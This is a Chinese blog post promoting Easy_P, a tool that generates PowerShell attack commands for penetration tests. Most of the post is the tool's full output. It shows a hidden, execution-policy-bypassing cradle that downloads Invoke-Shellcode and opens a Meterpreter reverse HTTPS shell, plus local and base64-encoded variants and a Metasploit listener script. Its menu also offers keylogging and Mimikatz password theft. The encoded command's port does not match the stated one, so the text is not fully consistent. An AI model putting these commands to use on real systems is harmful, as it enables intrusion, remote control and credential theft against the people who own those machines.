工具推荐:Easy_P powershell 常用代码生成辅助工具

  • A+
所属分类:安全工具

powershell功能强大,不仅仅体现在系统管理上。在日常的渗透过程中,为了规避防火墙等原因,我们需要一些powershell脚本来辅助我们完成渗透测试工作,对于不熟悉powershell脚本的来说,有一定的难度。还好有人已经想到了这一点,写了个辅助的python脚本,可以自动生成一些常用的powershell。

Easy_P github地址:https://github.com/cheetz/Easy-P.git

首先看简介

Easy_P is a tool used for showing a user which PowerShell scripts to use in a penetration test, depending on the users needs.

      PowerShell/WMI Generator
=========================================================
___________                              __________
_   _____/____    _________.__.         ______   
  |    __)___    /  ___<   |  |  ______  |     ___/
  |        / __ ____ ___  | /_____/  |    |    
 /_______  (____  /____  >/ ____|          |____|    
         /     /     / /                         
Easy_P | A Powershell / WMI Command Generator.
Written by Peter Kim <Author, The Hacker Playbook>
                     <CEO, Secure Planet LLC>
==================================================Easy-P==
-----------------------------------------------------
[1] Privilege Escalation
[2] Lateral Movement
[3] Keylogging
[4] PowerShell Meterpreter
[5] Change Users Execution Policy
[6] Powershell 101
[7] Base64 Encode a PowerShell Script
[8] Mimikatz - Passwords from Memory
[99] Exit/Quit
-----------------------------------------------------

我们选择4,生成一个反弹的meterpreter脚本

Select An Option: 4
[*]PowerShell Metasploit Meterpreter Reverse HTTPS Shell.  Original: https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1
LHOST: 192.168.1.103
LPORT: 55555

[*]Download from internet and execute:
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.103 -Lport 55555 -Force

[*]Run from a local copy of the script:
powershell.exe -exec bypass -Command "& {Import-Module .Invoke-Shellcode.ps1; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.103 -Lport 55555 -Force}"

[*]Base64 encoded version download and execute:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AYwBoAGUAZQB0AHoALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEMAbwBkAGUARQB4AGUAYwB1AHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUAIAAtAFAAYQB5AGwAbwBhAGQAIAB3AGkAbgBkAG8AdwBzAC8AbQBlAHQAZQByAHAAcgBlAHQAZQByAC8AcgBlAHYAZQByAHMAZQBfAGgAdAB0AHAAcwAgAC0ATABoAG8AcwB0ACAAMQA5ADIALgAxADYAOAAuADEALgAxADAAMwAgAC0ATABwAG8AcgB0ACAANQA1ADQANgAgAC0ARgBvAHIAYwBlAA==

[*]Listner Resource Script (listener.rc) - Save the following to a file called listener.rc on your Kali box and load your handler with msfconsole -r listener.rc
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.1.103
set LPORT 55555
set ExitOnSession false
exploit -j

可以看到生成了三种格式的powershell脚本,网络下载执行,本地执行,base64编码格式,其他的功能大家可以自行研究,限于篇幅原因,不多累赘。

本文始发于微信公众号(milsec):工具推荐:Easy_P powershell 常用代码生成辅助工具

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: